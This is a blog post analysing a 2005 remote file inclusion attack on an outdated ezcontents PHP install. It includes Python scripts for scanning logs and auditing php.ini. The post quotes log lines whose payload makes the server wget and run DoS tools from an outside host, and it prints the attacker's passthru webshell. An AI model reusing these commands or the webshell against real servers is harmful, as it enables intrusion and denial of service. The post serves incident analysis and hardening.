More details on php exploit from last week



Ok. I have a bit of time that I can sit down and get a little more detailed on what specifically happened late last week that shut the site down for a couple days.

At one point, I had updated the ezcontents script for the main site (averyjparker.com), but I had left (for about 2 years) a testbed install (at averyjparker.com/ncgen2) trying to setup a platform for an upgrade for the old Genealogy site (www.averyjparker.com/ncgen, new site is now at www.northcarolinagenealogy.net (linked at the top of the page.)) OK, so in searching through the logs here are some of the entries that caught my attention.

63.85.41.229 - - [14/Jul/2005:13:30:31 -0600] "POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1" 403 319 "http://www.averyjparker.com/" "-"
200.174.133.132 - - [14/Jul/2005:13:11:59 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:19 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;%20chmod%20777%20pdr;%20./pdr HTTP/1.1" 200 1072 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:09:42 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:09:21 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=wget HTTP/1.1" 200 1120 "-" "Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)"

I guess I should preface this with a simple fact: there are a LOT of exploit attempts that show up in web server logs. Here's a sample of one...
211.75.91.2 - - [14/Jul/2005:13:30:24 -0600] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 290 "http://www.averyjparker.com/" "-"

The first field is the IP address, then the timestamp, then the request itself (usually starting with POST or GET and ending with the protocol version). Next comes 404, the result code; a 404 means the requested file wasn't found.

What troubled me with the suspicious entries is that the result code was 200 (file found) and it was trying to pass various different bits of information to a php file (/ncgen2//include/db.php) which did exist.
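As an added example (not part of the original post), here is a small Python script that parses Apache combined-format entries laid out exactly as described above and flags the pattern that stood out in the suspicious lines: a query parameter whose value is itself a URL, answered with a 200. The sample entries are the post's own log lines rejoined onto single lines; nothing else is assumed.

```python
import re
from urllib.parse import unquote

# Apache combined log format: host ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A parameter value that is itself a URL is the signature of a remote file
# inclusion attempt: the script is being told to include() a remote file.
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Sample entries taken from the post's log excerpt, rejoined onto single lines.
SAMPLE_LOG = """\
200.174.133.132 - - [14/Jul/2005:13:09:21 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=wget HTTP/1.1" 200 1120 "-" "Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:11:59 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.91.2 - - [14/Jul/2005:13:30:24 -0600] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 290 "http://www.averyjparker.com/" "-"
63.85.41.229 - - [14/Jul/2005:13:30:31 -0600] "POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1" 403 319 "http://www.averyjparker.com/" "-"
"""


def parse_line(line):
    """Split one combined-format entry into its fields; None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"] = path
    # Split on '&' only (not ';'): the attacker's command text contains literal ';'.
    rec["params"] = [
        (unquote(k), unquote(v))
        for k, _, v in (pair.partition("=") for pair in query.split("&") if pair)
    ]
    return rec


def find_rfi_attempts(log_text):
    """Return one finding per entry that passes a remote URL in a query parameter."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        remote = [(k, v) for k, v in rec["params"] if REMOTE_URL.match(v)]
        if not remote:
            continue
        findings.append({
            "ip": rec["ip"],
            "time": rec["time"],
            "path": rec["path"],
            "status": int(rec["status"]),
            # A 200 means the target script existed and ran; a 404 would have been harmless.
            "served": rec["status"] == "200",
            "remote_params": remote,
            "cmd": dict(rec["params"]).get("cmd"),
        })
    return findings


def summarize(findings):
    """Count attempts and served (200) attempts per source address."""
    per_ip = {}
    for f in findings:
        total, served = per_ip.get(f["ip"], (0, 0))
        per_ip[f["ip"]] = (total + 1, served + (1 if f["served"] else 0))
    return per_ip


if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG)
    for h in hits:
        print(f'{h["time"]} {h["ip"]} {h["path"]} status={h["status"]}')
        for k, v in h["remote_params"]:
            print(f"    remote include via {k} = {v}")
        if h["cmd"]:
            print(f"    decoded cmd: {h['cmd']}")
    print("per-IP (attempts, served):", summarize(hits))
```

Run against a real access log, the two 404/403 probes drop out and only the db.php requests remain, with the URL-decoded cmd= value shown so the shell chain is readable without hand-decoding the %20s. The check is deliberately narrow (a parameter value starting with a URL scheme); widening it to look for any http:// inside a value would also catch the wget targets but would produce noise on ordinary redirect parameters.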

In fact, this bit
?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl
made it look like they were trying to load this file from caniggiamatador.com. I looked at the source of lila.jpg (not a real image file, by the way). It's basically an HTML file wrapped around this...
<?php
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
// $chdir and $cmd come straight from the request parameters (the cmd= value in the log entries above).
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
// HTML-escapes < and > so the captured output displays in a browser
// (the entities were flattened to plain < and > by the blog's rendering).
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
OK, so they're trying to inject these files: http://www.caniggiamatador.com/dos.pl and http://www.caniggiamatador.com/perldos.pl.

I looked at the code there and they were basically bash scripts that set up a denial of service attack on a specified target. Fairly clever and commented in Portuguese or Spanish. I've actually spent some time studying Spanish, but there was a lot that was either misspelled, or I simply didn't understand.

The site is down now, by the way. It looks like it was hosted by http://www.internetters.net/, and I suspect my service provider dealt with contacting them.

Since I'm a fairly curious person, I was also interested in the IP address that was originating the requests, 200.174.133.132. An IP whois lookup turned up this...

200.174.133.132 = [ 200-174-133-132-tau.cpe.vivax.com.br ]

I’m guessing a dialup? customer in Brazil (which might back up that the comments were in Portuguese).

I, of course, sent what I found to my service provider. They thanked me for the time I’d spent researching the issue and verified that was the file they were exploiting and that it was a DOS attack against their nameservers. They also sent along a couple of notes on changes to the php.ini that they made to blunt the attack.

disabled_functions: system, cmd, shell_exec, passthru, popen

These changes were intended to help prevent a future breach by the same method.
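As an added example, not from the post or from the hosting provider, here is a Python script that reads a php.ini fragment and checks the settings this incident depended on. Two caveats a practitioner would want: the directive is spelled disable_functions (the provider's note reads "disabled_functions", which PHP would ignore), and cmd is not a PHP function but the attacker's query-parameter name, so listing it does nothing. The era-appropriate controls are allow_url_fopen = Off (allow_url_include did not exist until PHP 5.2) and register_globals = Off, alongside a disable_functions list that also covers exec and proc_open. Both ini fragments below are constructed, not the host's real configuration.

```python
# Constructed php.ini fragments: the permissive settings the attack relied on,
# and the same directives hardened. Neither is the host's real configuration.
WEAK_INI = """\
; constructed: permissive settings
register_globals = On
allow_url_fopen = On
disable_functions =
"""

HARDENED_INI = """\
; constructed: hardened settings
register_globals = Off
allow_url_fopen = Off
disable_functions = system, shell_exec, passthru, popen, proc_open, exec
"""

# Functions that hand a string to a shell or spawn a process; the webshell above used passthru().
SHELL_FUNCTIONS = {"system", "shell_exec", "passthru", "popen", "proc_open", "exec"}

# Misspellings of the real directive name that PHP silently ignores.
NOT_DIRECTIVES = {"disabled_functions", "disable_function"}


def parse_ini(text):
    """Minimal php.ini reader: 'key = value' lines, ';' starts a comment."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def ini_bool(value):
    """php.ini truthiness: On/Yes/True/1 are on; anything else (including empty) is off."""
    return value.strip().strip('"').lower() in {"on", "yes", "true", "1"}


def audit(text):
    """Return the problems found in a php.ini fragment (empty list means nothing flagged)."""
    s = parse_ini(text)
    problems = []
    # Default has been Off since PHP 4.2.0; On makes request parameters into PHP variables.
    if ini_bool(s.get("register_globals", "Off")):
        problems.append("register_globals=On: query parameters such as cmd= become PHP variables")
    # Default is On; with it on, include() of an http:// path fetches and runs remote code.
    if ini_bool(s.get("allow_url_fopen", "On")):
        problems.append("allow_url_fopen=On: include() will fetch a URL such as GLOBALS[rootdp]=http://...")
    for bad in sorted(NOT_DIRECTIVES & set(s)):
        problems.append(f"'{bad}' is not a php.ini directive; use 'disable_functions'")
    disabled = {name.strip().lower() for name in s.get("disable_functions", "").split(",") if name.strip()}
    missing = sorted(SHELL_FUNCTIONS - disabled)
    if missing:
        problems.append("disable_functions leaves enabled: " + ", ".join(missing))
    return problems


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"{label}: {audit(ini) or ['no findings']}")
```

Disabling shell_exec also disables the backtick operator, so the hardened list closes that route too; what disable_functions cannot do is stop the remote include itself, which is why allow_url_fopen = Off is the setting that actually breaks this attack chain.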

Some details of the exploit can be found here: ezcontents code injection vulnerability

So, how did they find my site to attack? Who knows for certain, but I do have some ideas. I plan to detail those in an upcoming post.
